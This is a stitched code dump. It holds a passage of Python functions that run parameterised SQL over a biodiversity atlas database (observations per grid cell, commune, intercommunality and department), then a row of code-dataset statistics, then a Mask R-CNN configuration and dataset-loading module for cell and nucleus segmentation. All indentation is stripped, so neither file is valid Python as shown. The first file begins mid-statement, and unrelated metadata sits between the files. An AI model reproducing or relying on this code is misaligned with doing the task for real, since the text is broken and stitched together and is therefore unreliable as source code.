count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE obs.cd_ref in (
SELECT * FROM atlas.find_all_taxons_childs(:thiscdref)
)
OR obs.cd_ref = :thiscdref
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE obs.cd_ref in (
SELECT * FROM atlas.find_all_taxons_childs(:thiscdref)
)
OR obs.cd_ref = :thiscdref
ORDER BY id_maille"""
observations = connection.execute(text(sql), thiscdref=cd_ref)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
def pressionProspectionCommune(connection, insee):
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE o.insee = :thisInsee
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE o.insee = :thisInsee
ORDER BY id_maille"""
observations = connection.execute(text(sql), thisInsee=insee)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
# last observation for index.html
def lastObservationsMailles(connection, mylimit, idPhoto):
sql = """
SELECT obs.*,
tax.lb_nom, tax.nom_vern, tax.group2_inpn,
o.dateobs, o.altitude_retenue,
medias.url, medias.chemin, medias.id_media
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_taxons tax ON tax.cd_ref = obs.cd_ref
JOIN atlas.vm_observations o ON o.id_observation=obs.id_observation
LEFT JOIN atlas.vm_medias medias
ON medias.cd_ref = obs.cd_ref AND medias.id_type = :thisID
WHERE o.dateobs >= (CURRENT_TIMESTAMP - INTERVAL :thislimit)
ORDER BY o.dateobs DESC
"""
observations = connection.execute(
text(sql),
thislimit=mylimit,
thisID=idPhoto
)
obsList = list()
for o in observations:
if o.nom_vern:
inter = o.nom_vern.split(',')
taxon = inter[0] + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'id_observation': o.id_observation,
'id_maille': o.id_maille,
'cd_ref': o.cd_ref,
'dateobs': str(o.dateobs),
'altitude_retenue': o.altitude_retenue,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'group2_inpn': utils.deleteAccent(o.group2_inpn),
'pathImg': utils.findPath(o),
'id_media': o.id_media
}
obsList.append(temp)
return obsList
def lastObservationsCommuneMaille(connection, mylimit, insee):
sql = """
WITH last_obs AS (
SELECT
obs.cd_ref, obs.dateobs, t.lb_nom,
t.nom_vern, obs.the_geom_point as l_geom
FROM atlas.vm_observations obs
JOIN atlas.vm_communes c
/*ON ST_Intersects(obs.the_geom_point, c.the_geom)*/
ON obs.insee = c.insee
JOIN atlas.vm_taxons t
ON obs.cd_ref = t.cd_ref
WHERE c.insee = :thisInsee
ORDER BY obs.dateobs DESC
LIMIT :thislimit
)
SELECT l.lb_nom, l.nom_vern, l.cd_ref, m.id_maille, m.geojson_maille
FROM atlas.t_mailles_territoire m
JOIN last_obs l
ON st_intersects(l.l_geom, m.the_geom)
GROUP BY l.lb_nom, l.cd_ref, m.id_maille, l.nom_vern, m.geojson_maille
"""
observations = connection.execute(
text(sql), thisInsee=insee, thislimit=mylimit
)
obsList = list()
for o in observations:
if o.nom_vern:
taxon = o.nom_vern + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'cd_ref': o.cd_ref,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'id_maille': o.id_maille
}
obsList.append(temp)
return obsList
# Use for API
def getObservationsTaxonCommuneMaille(connection, insee, cd_ref):
sql = """
SELECT
o.cd_ref, t.id_maille, t.geojson_maille,
extract(YEAR FROM o.dateobs) as annee,
a.nom_organisme AS orgaobs
FROM atlas.vm_observations o
JOIN atlas.vm_communes c
/*ON ST_INTERSECTS(o.the_geom_point, c.the_geom)*/
ON o.insee = c.insee
JOIN atlas.t_mailles_territoire t
ON ST_INTERSECTS(t.the_geom, o.the_geom_point)
LEFT JOIN atlas.vm_organismes a
ON a.id_organisme = o.id_organisme
WHERE o.cd_ref = :thiscdref AND c.insee = :thisInsee
ORDER BY id_maille
"""
observations = connection.execute(
text(sql), thisInsee=insee, thiscdref=cd_ref
)
tabObs = list()
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
def lastObservationsEpciMaille(connection, mylimit, nom_epci_simple):
sql = """
WITH last_obs AS (
SELECT
obs.cd_ref, obs.dateobs, t.lb_nom,
t.nom_vern, obs.the_geom_point as l_geom
FROM atlas.vm_observations obs
JOIN atlas.vm_communes c
/*ON ST_Intersects(obs.the_geom_point, c.the_geom)*/
ON obs.insee = c.insee
JOIN atlas.vm_taxons t ON obs.cd_ref = t.cd_ref
JOIN atlas.l_communes_epci ec ON ec.insee = obs.insee
JOIN atlas.vm_epci e ON ec.id = e.id
WHERE e.nom_epci_simple = :thisNomEpciSimple
ORDER BY obs.dateobs DESC
LIMIT :thislimit
)
SELECT l.lb_nom, l.nom_vern, l.cd_ref, m.id_maille, m.geojson_maille
FROM atlas.t_mailles_territoire m
JOIN last_obs l
ON st_intersects(l.l_geom, m.the_geom)
GROUP BY l.lb_nom, l.cd_ref, m.id_maille, l.nom_vern
"""
observations = connection.execute(
text(sql), thisNomEpciSimple=nom_epci_simple, thislimit=mylimit
)
obsList = list()
for o in observations:
if o.nom_vern:
taxon = o.nom_vern + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'cd_ref': o.cd_ref,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'id_maille': o.id_maille
}
obsList.append(temp)
return obsList
def pressionProspectionEpci(connection, nom_epci_simple):
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.l_communes_epci ec ON ec.insee = o.insee
JOIN atlas.vm_epci e ON ec.id = e.id
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE e.nom_epci_simple = :thisNomEpciSimple
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.l_communes_epci ec ON ec.insee = o.insee
JOIN atlas.vm_epci e ON ec.id = e.id
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE e.nom_epci_simple = :thisNomEpciSimple
ORDER BY id_maille"""
observations = connection.execute(text(sql), thisNomEpciSimple=nom_epci_simple)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
def lastObservationsDptMaille(connection, mylimit, num_dpt):
sql = """
WITH last_obs AS (
SELECT
obs.cd_ref, obs.dateobs, t.lb_nom,
t.nom_vern, obs.the_geom_point as l_geom
FROM atlas.vm_observations obs
JOIN atlas.vm_communes c
/*ON ST_Intersects(obs.the_geom_point, c.the_geom)*/
ON obs.insee = c.insee
JOIN atlas.vm_taxons t ON obs.cd_ref = t.cd_ref
WHERE left(obs.insee,2)::int = :thisNumdpt
ORDER BY obs.dateobs DESC
LIMIT :thislimit
)
SELECT l.lb_nom, l.nom_vern, l.cd_ref, m.id_maille, m.geojson_maille
FROM atlas.t_mailles_territoire m
JOIN last_obs l
ON st_intersects(l.l_geom, m.the_geom)
GROUP BY l.lb_nom, l.cd_ref, m.id_maille, l.nom_vern, m.geojson_maille
"""
observations = connection.execute(
text(sql), thisNumdpt=num_dpt, thislimit=mylimit
)
obsList = list()
for o in observations:
if o.nom_vern:
taxon = o.nom_vern + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'cd_ref': o.cd_ref,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'id_maille': o.id_maille
}
obsList.append(temp)
return obsList
def lastObservationsDptMaille10(connection, mylimit, num_dpt):
sql = """
WITH last_obs AS (
SELECT
obs.cd_ref, obs.dateobs, t.lb_nom,
t.nom_vern, obs.the_geom_point as l_geom
FROM atlas.vm_observations obs
JOIN atlas.vm_communes c
/*ON ST_Intersects(obs.the_geom_point, c.the_geom)*/
ON obs.insee = c.insee
JOIN atlas.vm_taxons t ON obs.cd_ref = t.cd_ref
WHERE left(obs.insee,2)::int = :thisNumdpt
ORDER BY obs.dateobs DESC
LIMIT :thislimit
)
SELECT l.lb_nom, l.nom_vern, l.cd_ref, m.id_maille, m.geojson_maille
FROM atlas.t_mailles_10_territoire m
JOIN last_obs l
ON st_intersects(l.l_geom, m.the_geom)
GROUP BY l.lb_nom, l.cd_ref, m.id_maille, l.nom_vern, m.geojson_maille
"""
observations = connection.execute(
text(sql), thisNumdpt=num_dpt, thislimit=mylimit
)
obsList = list()
for o in observations:
if o.nom_vern:
taxon = o.nom_vern + ' | ' + o.lb_nom
else:
taxon = o.lb_nom
temp = {
'cd_ref': o.cd_ref,
'taxon': taxon,
'geojson_maille': ast.literal_eval(o.geojson_maille),
'id_maille': o.id_maille
}
obsList.append(temp)
return obsList
def pressionProspectionDpt(connection, num_dpt):
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE left(o.insee,2)::int = :thisNumdpt
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE left(o.insee,2)::int = :thisNumdpt
ORDER BY id_maille"""
observations = connection.execute(text(sql), thisNumdpt=num_dpt)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
def pressionProspectionDpt10(connection, num_dpt):
if config.GROS_JEU_DONNEES:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
count(obs.id_observation) as nbobs,
max(extract(year from dateobs)) as annee
FROM atlas.vm_observations_mailles_10 obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE left(o.insee,2)::int = :thisNumdpt
GROUP BY
obs.id_maille,
obs.geojson_maille,
a.nom_organisme
ORDER BY obs.id_maille"""
else:
sql = """SELECT
obs.id_maille,
obs.geojson_maille,
a.nom_organisme AS orgaobs,
o.dateobs,
extract(YEAR FROM o.dateobs) as annee
FROM atlas.vm_observations_mailles_10 obs
JOIN atlas.vm_observations o ON o.id_observation = obs.id_observation
JOIN atlas.vm_taxons t ON t.cd_ref=o.cd_ref
JOIN atlas.vm_organismes a ON a.id_organisme = o.id_organisme
WHERE left(o.insee,2)::int = :thisNumdpt
ORDER BY id_maille"""
observations = connection.execute(text(sql), thisNumdpt=num_dpt)
tabObs = list()
if config.GROS_JEU_DONNEES:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': o.nbobs,
'annee': o.annee,
'dateobs': None,
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
else:
for o in observations:
temp = {
'id_maille': o.id_maille,
'nb_observations': 1,
'annee': o.annee,
'dateobs': str(o.dateobs),
'orga_obs': o.orgaobs,
'geojson_maille': ast.literal_eval(o.geojson_maille)
}
tabObs.append(temp)
return tabObs
| 34.022298 | 83 | 0.564709 | 2,480 | 19,835 | 4.299597 | 0.058468 | 0.050267 | 0.045391 | 0.034512 | 0.891025 | 0.873582 | 0.870487 | 0.86561 | 0.857732 | 0.832692 | 0 | 0.002092 | 0.349332 | 19,835 | 582 | 84 | 34.080756 | 0.824113 | 0.003227 | 0 | 0.833977 | 0 | 0.005792 | 0.589729 | 0.071895 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021236 | false | 0 | 0.007722 | 0 | 0.050193 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1e9276c6375b06cec4ed88f114eb96125805792e | 17,397 | py | Python | samples/cells_and_cores/cells_and_cores.py | umr-ds/feature_pyramid_fusion | 84053a1de74ee50f79e34fd4e2f75a5950797a9a | [
"MIT"
] | 6 | 2021-04-26T12:27:16.000Z | 2021-11-26T09:06:24.000Z | samples/cells_and_cores/cells_and_cores.py | umr-ds/feature_pyramid_fusion | 84053a1de74ee50f79e34fd4e2f75a5950797a9a | [
"MIT"
] | 1 | 2021-05-05T15:05:07.000Z | 2021-05-18T12:38:02.000Z | samples/cells_and_cores/cells_and_cores.py | umr-ds/feature_pyramid_fusion | 84053a1de74ee50f79e34fd4e2f75a5950797a9a | [
"MIT"
] | null | null | null | """
Mask R-CNN
Configurations and data loading code for cells and cores.
"""
############################################################
# Configurations
############################################################
import os
import sys
import skimage
from skimage.color import rgb2gray
import numpy as np
import pickle as pkl
import gzip
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import utils
class CoresConfig(Config):
MASK_SHAPE = [28, 28]
LOSS_WEIGHTS = {
"rpn_class_loss": 1.,
"rpn_bbox_loss": 2.,
"mrcnn_class_loss": 1.,
"mrcnn_bbox_loss": 2.,
"mrcnn_mask_loss": 2.
}
CORE_SUFFIX = "_core" # Suffix for parameters/layer for core model
MEAN_PIXEL = [ 112.5 ]
USE_CORE_FEATURES = False # Train only cores
NAME = "cores"
# Train on 3 GPU and 8 original_images per GPU. We can put multiple original_images on each
# GPU because the original_images are small. Batch size is 8 (GPUs * original_images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 2
BACKBONE = "resnet50"
# Number of classes (including background)
NUM_CLASSES = 1 + 1 # background + one class
RPN_ANCHOR_SCALES = (32, 64, 128, 256, 512)
USE_MINI_MASK = False
POST_NMS_ROIS_TRAINING = 1000
POST_NMS_ROIS_INFERENCE = 500
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 512
IMAGE_RESIZE_MODE = 'none'
STEPS_PER_EPOCH = 1000
DETECTION_MAX_INSTANCES = 200
class CellsConfig(CoresConfig):
name = "cells"
class Cells2ChannelConfig(CellsConfig):
MEAN_PIXEL = [ 112.5 , 112.5 ]
NAME = "input_2channels"
INPUT_CHANNELS = 2
# NO_IMAGE_SCALE = True # if use imagenet pretrained model, which has no scaling!
class CellsAndCoresConfig(CoresConfig):
NAME = "cells_and_cores"
USE_CORE_FEATURES = True # Use features of core model in training
USE_BORDER_WEIGHTS = True
class CoresDataset(utils.Dataset):
"""Contains only cores
"""
FIXED_INPUT_SHAPE = False
def load_image(self, image_id):
"""Load the specified image and return a [H,W,1] Numpy array.
"""
# Load image
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 2 # Grayscale required
image = np.reshape(image,list(image.shape)+[1])
return image
def load_image_vis(self, image_id):
"""Load the specified image and return a [H,W,3] Numpy array.
Do not convert to one channel array (for visualization)
"""
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 2
return image
def load_data(self, dataset_dir, subset):
self.add_class("core", 1, "core")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", "testeval", ""]
image_dir = os.path.join(dataset_dir,subset,"images")
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"0.png")
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
# assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"core",
image_id =i,
image_name=img_name,
path=image_path,
height=height,width=width)
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/gt/"+img_name
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png") and f.startswith("0_"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "core":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
class CellsDataset(utils.Dataset):
"""
Contains only cores
"""
FIXED_INPUT_SHAPE = False
def load_image(self, image_id):
"""Load the specified image and return a [H,W,1] Numpy array.
"""
# Load image
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 2 # Grayscale required
image = np.reshape(image,list(image.shape)+[1])
return image
def load_image_vis(self, image_id):
"""Load the specified image and return a [H,W,3] Numpy array.
Do not convert to one channel array (for visualization)
"""
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 2
return image
def load_data(self, dataset_dir, subset):
self.add_class("cell", 1, "cell")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", ""]
image_dir = os.path.join(dataset_dir,subset,"images")
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"1.png")
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"cell",
image_id =i,
image_name=img_name,
path=image_path,
height=height,width=width)
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/gt/"+img_name
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png") and f.startswith("1_"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "cell":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
class CellsWithCoresDataset(CoresDataset):
"""Extends CoreDataset with methods for loading cores and segmentation weights
"""
def load_core_image(self, image_id):
image = skimage.io.imread(self.image_info[image_id]['core_path'])
assert image.ndim == 2
image = np.reshape(image,list(image.shape)+[1])
return image
def load_core_image_vis(self, image_id):
image = skimage.io.imread(self.image_info[image_id]['core_path'])
assert image.ndim == 2
return image
def load_weight_image(self, image_id):
weights_path = os.path.join(self.dataset_dir, self.subset, "gt",
self.image_info[image_id]["image_name"], "weights","1_weights.pkl")
with gzip.open(weights_path, 'rb') as f:
weights = pkl.load(f, encoding='latin1') + 1.
# add single channel
weights = np.reshape(weights,list(weights.shape)+[1])
return weights
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
# [height, width, instance_count]
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/gt/"+img_name
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png") and f.startswith("1_"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def load_data(self, dataset_dir, subset):
self.add_class("cell", 1, "cell")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", ""]
image_dir = os.path.join(dataset_dir,subset,"images")
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"1.png")
core_path = os.path.join(image_dir,img_name,"0.png")
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
# assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"cell",
image_id=i,
image_name=img_name,
path=image_path,
core_path=core_path,
height=height,width=width)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "cell":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
class CoresDSB18Dataset(utils.Dataset):
"""Contains only cores
"""
def load_core_image(self, image_id):
image = skimage.io.imread(self.image_info[image_id]['core_path'])
# assert image.ndim == 2
image = rgb2gray(image)
image = np.reshape(image,list(image.shape)+[1])
return image
def load_core_image_vis(self, image_id):
image = skimage.io.imread(self.image_info[image_id]['core_path'])
#assert image.ndim == 2
return image
def load_image(self, image_id):
"""Load the specified image and return a [H,W,1] Numpy array.
"""
# Load image
image = skimage.io.imread(self.image_info[image_id]['path'])
# assert image.ndim == 2 # Grayscale required
image = rgb2gray(image)
image = np.reshape(image,list(image.shape)+[1])
return image
def load_image_vis(self, image_id):
"""Load the specified image and return a [H,W,3] Numpy array.
Do not convert to one channel array (for visualization)
"""
image = skimage.io.imread(self.image_info[image_id]['path'])
#assert image.ndim == 2
return image
def load_data(self, dataset_dir, subset):
self.add_class("core", 1, "core")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", "testeval", ""]
image_dir = os.path.join(dataset_dir,subset)
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"images",img_name+".png")
core_path = image_path
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"core",
image_id =i,
image_name=img_name,
path=image_path,
core_path=core_path,
height=height,width=width)
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/"+img_name+"/masks"
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "core":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
class Cells2ChannelDataset(utils.Dataset):
FIXED_INPUT_SHAPE = False
INPUT_SHAPE = [ 512, 512]
# img[:,:,1] = img_cell[:,:]
# img[:,:,2] = img_core[:,:]
# img[:,:,0] = 0
def load_image(self, image_id):
"""Load the specified image and return a [H,W,1] Numpy array.
"""
# Load image
image = skimage.io.imread(self.image_info[image_id]['path'])
assert image.ndim == 3 # rgb required
#image = np.reshape(image,list(image.shape)+[1])
image = image[:,:,[1,2]] # first channel should be black
assert image.shape[2] == 2
return image
def load_image_vis(self, image_id):
"""Load the specified image and return a [H,W,3] Numpy array.
Do not convert to one channel array (for visualization)
"""
image = skimage.io.imread(self.image_info[image_id]['path'])
#assert image.ndim == 2
return image
def load_data(self, dataset_dir, subset):
self.add_class("cell", 1, "cell")
self.dataset_dir = dataset_dir
self.subset = subset
# Train or validation dataset?
assert subset in ["train", "val", ""]
image_dir = os.path.join(dataset_dir,subset,"images")
for i,img_name in enumerate(next(os.walk(image_dir))[1]):
image_path = os.path.join(image_dir,img_name,"rgb.png")
if not self.FIXED_INPUT_SHAPE:
image = skimage.io.imread(image_path)
assert np.sum(image[:,:,0]) == 0 # First channel must be empty
height, width = image.shape[:2]
else:
height, width = self.INPUT_SHAPE
self.add_image(
"cell",
image_id =i,
image_name=img_name,
path=image_path,
height=height,width=width)
def load_mask(self, image_id):
"""Generate instance gt for an image.
Returns:
gt: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance gt.
"""
info = self.image_info[image_id]
img_name = info['image_name']
path_to_masks= self.dataset_dir+"/"+self.subset+"/gt/"+img_name
mask = []
for f in next(os.walk(path_to_masks))[2]:
if f.endswith(".png") and f.startswith("1_"):
m = skimage.io.imread(os.path.join(path_to_masks, f)).astype(np.bool)
mask.append(m)
mask = np.stack(mask, axis=-1)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID, we return an array of ones
return mask, np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "cell":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
